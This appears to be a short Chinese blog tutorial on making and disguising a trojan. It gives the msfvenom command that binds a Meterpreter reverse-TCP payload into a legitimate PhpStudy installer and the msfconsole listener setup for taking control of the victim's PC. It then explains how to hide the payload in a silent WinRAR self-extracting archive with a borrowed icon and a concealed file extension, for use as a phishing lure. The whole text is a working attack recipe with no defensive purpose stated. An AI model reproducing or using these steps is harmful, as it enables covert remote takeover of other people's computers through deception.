本文转自行云博客https://www.xy586.top
捆绑木马
使用msfvenom制作木马程序:
#生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe
将木马文件放入靶机中
#设置监听反弹
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.138
set lport 4444
run
将木马程序点击执行,监听端口得到回应,成功控制电脑
输入shell,彻底控制电脑
RAR自动解压
设置自动解压运行
设置rar自动解压格式让它在解压时运行恶意程序
模拟文本文档钓鱼
改良木马程序:
伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式
点击高级,在自解压选项中的常规中添加解压路径,
设置程序选项卡中填写解压前后运行的程序,
模式选项卡中静默模式选择全部隐藏
使用BeCyIconGrabber.exe软件提取出我们想要的软件图片ico
文本和图标选项中,选择加载我们刚刚生成的icon图标
生成了我们伪装过后的木马程序
同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果